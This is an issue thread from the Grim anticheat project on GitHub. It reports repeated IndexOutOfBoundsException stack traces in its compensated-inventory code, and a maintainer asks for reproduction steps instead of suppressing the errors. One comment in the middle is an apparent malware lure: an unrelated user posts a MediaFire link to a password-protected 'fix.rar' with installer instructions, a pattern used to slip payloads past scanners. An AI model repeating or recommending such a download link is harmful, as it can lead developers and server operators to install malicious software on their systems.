### ISSUE TITLE
Index out of bounds in compensated inventory

### ISSUE THREAD

**Issue by ghost** [GrimAnticheat/Grim#1687]
### Stack trace

```
[19:20:46] [Netty Epoll Server IO #0/INFO]: [GrimAC] [STDOUT] An error has occurred when running transactions for player: king_kunta
[19:20:46] [Netty Epoll Server IO #0/WARN]: java.lang.IndexOutOfBoundsException: Index 0 out of bounds for length 0
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.outOfBounds(Preconditions.java:100)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Preconditions.java:106)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.checkIndex(Preconditions.java:302)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.util.Objects.checkIndex(Objects.java:385)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.util.ArrayList.get(ArrayList.java:427)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.inventory.inventory.AbstractContainerMenu.getSlot(AbstractContainerMenu.java:423)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.latency.CompensatedInventory.lambda$onPacketSend$7(CompensatedInventory.java:472)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.latency.LatencyUtils.handleNettySyncTransaction(LatencyUtils.java:56)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.player.GrimPlayer.addTransactionResponse(GrimPlayer.java:338)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.events.packets.PacketPingListener.onPacketReceive(PacketPingListener.java:62)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.event.PacketReceiveEvent.call(PacketReceiveEvent.java:44)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.event.EventManager.callEvent(EventManager.java:84)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.util.PacketEventsImplHelper.handleServerBoundPacket(PacketEventsImplHelper.java:84)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.read(PacketEventsDecoder.java:57)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.decode(PacketEventsDecoder.java:64)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.decode(PacketEventsDecoder.java:41)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:88)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flow.FlowControlHandler.dequeue(FlowControlHandler.java:202)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flow.FlowControlHandler.channelRead(FlowControlHandler.java:164)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.timeout.IdleStateHandler.channelRead(IdleStateHandler.java:286)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flush.FlushConsolidationHandler.channelRead(FlushConsolidationHandler.java:152)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.AbstractEpollStreamChannel$EpollStreamUnsafe.epollInReady(AbstractEpollStreamChannel.java:800)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.EpollEventLoop.processReady(EpollEventLoop.java:509)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:407)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)
[19:20:46] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.lang.Thread.run(Thread.java:1583)
```

```
[19:20:48] [Netty Epoll Server IO #0/INFO]: [GrimAC] [STDOUT] An error has occurred when running transactions for player: king_kunta
[19:20:48] [Netty Epoll Server IO #0/WARN]: java.lang.IndexOutOfBoundsException: Index 2 out of bounds for length 0
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.outOfBounds(Preconditions.java:100)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Preconditions.java:106)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/jdk.internal.util.Preconditions.checkIndex(Preconditions.java:302)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.util.Objects.checkIndex(Objects.java:385)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.util.ArrayList.get(ArrayList.java:427)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.inventory.inventory.AbstractContainerMenu.getSlot(AbstractContainerMenu.java:423)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.latency.CompensatedInventory.lambda$onPacketSend$7(CompensatedInventory.java:472)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.utils.latency.LatencyUtils.handleNettySyncTransaction(LatencyUtils.java:56)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.player.GrimPlayer.addTransactionResponse(GrimPlayer.java:338)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.events.packets.PacketPingListener.onPacketReceive(PacketPingListener.java:62)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.event.PacketReceiveEvent.call(PacketReceiveEvent.java:44)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.event.EventManager.callEvent(EventManager.java:84)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.com.github.retrooper.packetevents.util.PacketEventsImplHelper.handleServerBoundPacket(PacketEventsImplHelper.java:84)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.read(PacketEventsDecoder.java:57)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.decode(PacketEventsDecoder.java:64)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at grim.jar//ac.grim.grimac.shaded.io.github.retrooper.packetevents.injector.handlers.PacketEventsDecoder.decode(PacketEventsDecoder.java:41)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:88)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flow.FlowControlHandler.dequeue(FlowControlHandler.java:202)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flow.FlowControlHandler.channelRead(FlowControlHandler.java:164)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:346)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:318)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.timeout.IdleStateHandler.channelRead(IdleStateHandler.java:286)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.handler.flush.FlushConsolidationHandler.channelRead(FlushConsolidationHandler.java:152)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:442)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.AbstractEpollStreamChannel$EpollStreamUnsafe.epollInReady(AbstractEpollStreamChannel.java:800)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.EpollEventLoop.processReady(EpollEventLoop.java:509)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:407)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)
[19:20:48] [Netty Epoll Server IO #0/WARN]: 	at java.base/java.lang.Thread.run(Thread.java:1583)
```

### How to replicate it if known

Grim always does this, ever since i first got it, its always arrayindexoutofbounds in compensated inventory, and it always never really does anything, im kinda joking but u should just try { }catch ignored these ugly stack traces

### Grim version

3d3d3d5e9d5903004a0f5fd41e64ea3fa9156146

### Server version

1.21.1 paper latest

### Plugins

grim

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SamB440** [comment]
You are the only person that has had these issues, you definitely have some weird server setup. If you want support then give proper reproduction steps and server setup. I'm not going to try catch as that just hides a potential issue.
